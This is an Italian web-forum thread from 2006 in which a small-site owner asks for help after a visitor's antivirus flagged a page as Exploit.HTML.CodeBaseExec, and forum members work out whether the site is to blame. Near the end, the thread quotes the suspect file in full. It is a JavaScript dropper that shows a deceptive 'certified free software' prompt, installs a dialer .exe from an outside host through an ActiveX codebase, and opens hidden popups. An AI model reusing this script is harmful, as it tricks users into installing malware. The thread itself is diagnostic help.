AIUTO SU VIRUS CHE FORSE E' SUL MIO SITO

di **geofree** » 02/02/06 14:19

Ciao a tutti! Vi devo chiedere aiuto su una cosa. Mi e' stato segnalato da un utente del mio piccolo sito la seguente cosa:
(riporto testo integrale)

"vorrei segnalare che quando accedo al sito indicato da geofree, mi si apre l'antivirus e mi trova il seguente file infetto:
C:\Documents and Settings\............\Impostazioni locali\Temporary Internet Files\Content.IE5\87TNMYJL\script-19[1].htm
Eliminazione virus non riuscita Exploit.HTML.CodeBaseExec
ora vedo di documentarmi un po' sul nome del virus...poi vi aggiornerò
Exploit.HTML.CodeBaseExec (Kaspersky Lab) is also known as: JS/IllWill (McAfee), W32.Beagle.AO@mm (Symantec), JS/IllWill-A (Sophos), JS/Dword.dr* (RAV), HTML_BAGLE.AC (Trend Micro), JS/MediaTickets.B (H+BEDV), JS/Objcode.A (FRISK), JS/IllWill (Grisoft), HTML.MediaTickets.B (SOFTWIN), Trojan.JS.RunMe (ClamAV), Adware/MediaTickets (Panda), JS/TrojanDownloader.gen (Eset)"

Che cosa ne pensate? Sono io che ho infettato la pagina del mio sito caricandola? Mi sembra strano ho l' antivirus Avast! sempre aggiornato, quando accedo al mio sito non mi segnala nulla... inoltre da una scansione fatta sul mio computer un mesetto fa era tutto pulito. Avevo fatto la scansione anche con Ad-Aware (anche lui aggiornato).

Cosa ne pensate?

Se volete potete accedere al sito, l' indirzzo e' questo:
http://www30.websamba.com/abruzzo/

Io ora riprovero' a fare la scansione del mio comp con antivirus ed antispy

di **Dylan666** » 02/02/06 14:27

Ci potresti dare l'indirizzo esatto della pagina script-19.htm?

di **fabrizius** » 02/02/06 14:32

inoltre da una scansione fatta sul mio computer un mesetto fa era tutto pulito. Avevo fatto la scansione anche con Ad-Aware (anche lui aggiornato).

mi sembrano un po poche una scansione al mese...io ne farei una a settimana con i tempi che corrono

di **geofree** » 02/02/06 14:33

ho chiesto all'utente di scrivermela ed aspetto che mi risponda
intanto mi ha scritto il seguente msg:

"ora quando lo riapro non mi dice più nulla l'antivirus, c'è da dire che avevo altre finestre aperte ma erano tutti su siti che frequento quotidianamente e che non mi hanno mai dato alcun problema, non posso dirlo con certezza che sia colpa del tuo sito ma ho forti dubbi, la mia non vuole essere un'accusa ma solo un avviso per gli altri utenti, a volte gli antivirus prendono fischi per fiaschi, dopo provo da un altro PC..............
ho provato ora da un altro PC, che ha un altro antivirus installato, e mi ha caricato la pagina senza problemi, non so dire di preciso da dove possa essere derivato il problema, mi dispiace se vi ho allarmato inutilmente........ma qualche dubbio mi rimane....... forse uno di quei banner presenti nel sito ha qualche link "maligno" all'insaputa del nostro amico skiforumista...boh........"

di **Dylan666** » 02/02/06 14:37

I banner sono banner, non pagine HTM. Il virus è stato trovato in una pagina htm chiamata scritp-19.htm.
Se nel tuo sito non ci sono collegamenti dinamici o statici a quella pagina allora il problema non è tuo.

PS @fabrizius: non ci sono tempi che corrono coi virus, o si è attenti e col PC aggiornato o no, tutto qui!
Voglio proprio vedere chi è che ha voglia di scandire un disco di magari 250 Gb una volta ogni sette giorni...

di **geofree** » 02/02/06 14:40

come faccio a vedere se ci sono collegamenti statici o dinamici a quella pagina?

comunque non so se possa servire ma sul mio pc non puo' esserci quel file perche' partendo da Documents&Settings non ho la cartella Impostazioni Locali che segue subito dopo nel percorso...

di **geofree** » 02/02/06 14:42

aspe' ho detto una cagata devo partire da Impostazioni Locali

di **geofree** » 02/02/06 14:47

sono andato su "cerca" di Windows XP e gli ho detto di cercare su C: il file script-19[1].htm e non ha trovato nulla...

di **geofree** » 02/02/06 14:48

almeno il file non dovrebbe stare sul mio comp...

di **Dylan666** » 02/02/06 15:00

intendevo dire: se non hai creato tu nessuna pagina con quel nome o non hai messo script che mostrino pagine di altri siti che possano avere quel nome allora il virus non è tuo

di **Dylan666** » 02/02/06 15:01

geofree ha scritto:sono andato su "cerca" di Windows XP e gli ho detto di cercare su C: il file script-19[1].htm e non ha trovato nulla...

ps: le parentesi quadre e l'uno li aggiunge la cartella dei file temporanei, come ho già detto la pagina si deve chiamare script-19.htm

di **geofree** » 02/02/06 15:05

ho cercato con script-19.htm senza parentesi e niente ancora

ma scusate l'ignoranza ma il fatto che l'indirizzo del file parta con c:\ non vuol dire che il file risiede sul SUO computer... se fosse stato su qualcun'altro non ci sarebbe stato un http:\\ davanti???

di **Dylan666** » 02/02/06 15:19

Quando tu visiti un sito le pagine che vedi vanno a finere nella cartella dei file temporanei ed è lì che il l'antivirus ha individuato l'infezione ovviamente. Bisogna vedere se il file è stato creato accedendo a una pagina tua o no, ma a quanto vedo direi di no.

Ad ogni modo ringrazia delle segnalazione e chiedi di essere contattato nuovamente se ri-accade, possibilmente segnalando che pagine stava guardando quando è apparso l'avviso dell'antivirus e magari facendoti spedire la pagina in allegato (ovviamente quando la ricevi non metterla in quarantena e cmabiagli l'estensione in TXT, o comunque apri il file solo col Blocco Note di Windows).

di **geofree** » 02/02/06 15:22

glielo diro' anche se l'utente suddetto non si e' comportato in maniera egregia segnalando la cosa su un forum pubblico di sci senza nemmeno provare a contattarmi via pm! :evil:

di **geofree** » 02/02/06 15:24

comunque vi ringrazio molto per l'aiuto che siete sempre pronti a darmi!
come farei senza di voi?

grazie!

di **geofree** » 02/02/06 15:26

ecco l'ultimo msg dell'utente, a titolo di curiosita':

"quel file li non c'è più perchè una volta che l'antivirus l'ha scoperto, non potendolo disinfettare, l'ha eliminato, cmq può essere che il mio antivirus sia intervenuto su un file temporaneo di internet già presente nella mia cartella (un file che non c'entra col tuo sito) mentre aprivo il tuo sito così da indurmi erroneamente a pensare che il problema fosse il tuo sito......
aggiornamento: sono andato a vedere nell'altro PC la cartella dei file temporanei e......... tadadadadada è presente il file incriminato ed ha la data e l'ora di quando ho aperto la pagina web sull'altro PC solo che il McAfee non lo vede come un virus"

di **Dylan666** » 02/02/06 15:34

Non so che dirti... potrebbe aver ri-visitato quella pagina poco dopo ma magari il webmaster (del vero sito a cui appartiene) aveva appena risolto il problema ne codice...
Oppure il comando che ha dato non era di cancellazione della pagina, oppure era quello ma l'antivius per qualche motivo non ci è riuscito... o ancora, l'antivirus si è sbagliato e con le nuove definizioni non segnala più quel file "pulito"... oppure il codice era in una pagina frame di websamba.com anche se il tuo sito non sembra averne.. boh! :undecided:

di **geofree** » 02/02/06 15:40

aspe' ti spiego meglio la situazione:

l'utente sta agendo su 2 COMPUTER

nel PRIMO e' avvenuto il fattaccio metre era collegato al mio sito, l'antivirus (che non so quale sia, forse McCafee) l' ha rilevato e cancellato

poi lui e' andato a controllare la situzione di un SECONDO computer che non so se si sia mai collegato al mio sito e nei suoi file temporanei ha trovato il file incriminato solo che l'antivirus McCafee non l'ha rilevato questa volta

di **Dylan666** » 02/02/06 15:42

Beh potrebbero essere anche due file con lo stesso nome che sono completamente diversi e vengono da siti diversi... infondo script-19.htm è abbastanza comune... anche se sa un po' troppo di coincidenza

di **geofree** » 02/02/06 15:43

Blocca tutto e' successo un macello dice che il file sta sul mio comp!
Ecco un altro msg:

Riepiloghiamo: nelle cartella dei file temporanei di internet, quando visito il tuo sito, mi ritrovo il file script-19[1].html, lo posso dire con certezza che è il tuo sito perchè prima di accedervi pulisco tuttta la cartella; una volta che l'ho visitato torno nella cartella dei file temporanei di internet e mi ritrovo il file, se lo analizzo con Kasperky mi da un messaggio di avviso; se lo analizzo con McAfee non trova nulla di infetto; se vuoi io ti posso inviare il file .html infetto; se apro il file html con un editor di testo il contenuto è il seguente:

Citazione:

window.onerror = errorwindow;
function errorwindow(){return true; };
var msie = 1;
var sp2 = 0 ;
var win = 1 ;
var x_check_Z = "";
var nav = navigator.userAgent.toLowerCase() ;
var disclaimer;

if (navigator.userLanguage) {
var lan = navigator.userLanguage.toLowerCase() }
else {var lan = navigator.language.toLowerCase()
};

if(nav) {
if (!(nav.match(/msie/))) msie =0;

if(!(nav.match(/win/))) {win=0}
else if (nav.match(/sv1/)){sp2 = 1};
}
else {win = 0;msie=0};

function ErrorActiveX() {
if (confirm(disclaimer)) {document.body.insertAdjacentHTML("BeforeEnd",x_check_Z) }
else {setTimeout('document.body.insertAdjacentHTML("BeforeEnd",x_check_Z)',50000)};
};

if (msie==1) {var wparam = "toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,width=0,height=0,top=50000,left=50000" }
else {var wparam = "toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,width=150,height=160,top=5000,left=5000"};

function go_adsl() {
if (win==1 && msie==1) {

}
else {

};
};

function go_dialup() {
if (0 >1 && sp2==1 ) {

} else if (win==1 && msie==1) {
if(lan && lan.toLowerCase().match(/it/) ) {
disclaimer = "\nNel tuo pc non e' installato il software di accesso.\n\nPer visualizzare il sito devi installare correttamente questo software garantito contro ogni virus!\n\nClicca su SI nell'avviso di protezione\n\n\nTi ricordiamo che il software e' GRATUITO e certificato!\n\n\nVuoi visitare il sito ?\n";
}
else {
disclaimer = "\nYou have to install the connection software to visit this site.\n\nIt is tested 100% virus free\n\nDo you wanto to proceed ?";
};

x_check_Z = '<object ONERROR="ErrorActiveX();" id="A" CLASSID="CLSID:DB893839-10F0-4AF9-92FA-B23528F530AF" codebase="http://deposito.hostance.net/dialer/1054722.exe"></object>';
document.body.insertAdjacentHTML("BeforeEnd",x_check_Z) ;
var aA1=window.open('http://cn.x69x.net/win/win-99.htm?ritardo=12000&pp=MYLINK 12*252*142*445','my1',wparam);
var aA2=window.open('http://cn.x69x.net/win/win-99.htm?ritardo=142000&pp=MYLINK 12*252*142*445','my2',wparam);
var aA3=window.open('http://cn.x69x.net/win/win-99.htm?ritardo=240000&pp=POP SPECIAL 12*152*240','my3',wparam);

}
else {

};
};

if (!(sp2==1 && 0==0) && !( win==0 && 0==0) ) {

var IMG_TESTaZ = new Image();
var date = new Date();
IMG_TESTaZ.src = "http://cn.x69x.net/adsl.jpg?nocache&" + Date.parse(date);
setTimeout('if(IMG_TESTaZ.complete) {go_adsl() } else {go_dialup() }', 1300 );

};

script.JPG
Descrizione:
Dimensioni: 65.43 KB
Visto: 0 Volte(s)

script.JPG

kaspersky.jpg
Descrizione:
Dimensioni: 82.84 KB
Visto: 0 Volte(s)

kaspersky.jpg

AIUTO SU VIRUS CHE FORSE E' SUL MIO SITO

AIUTO SU VIRUS CHE FORSE E' SUL MIO SITO

Topic correlati a "AIUTO SU VIRUS CHE FORSE E' SUL MIO SITO":

Chi c’è in linea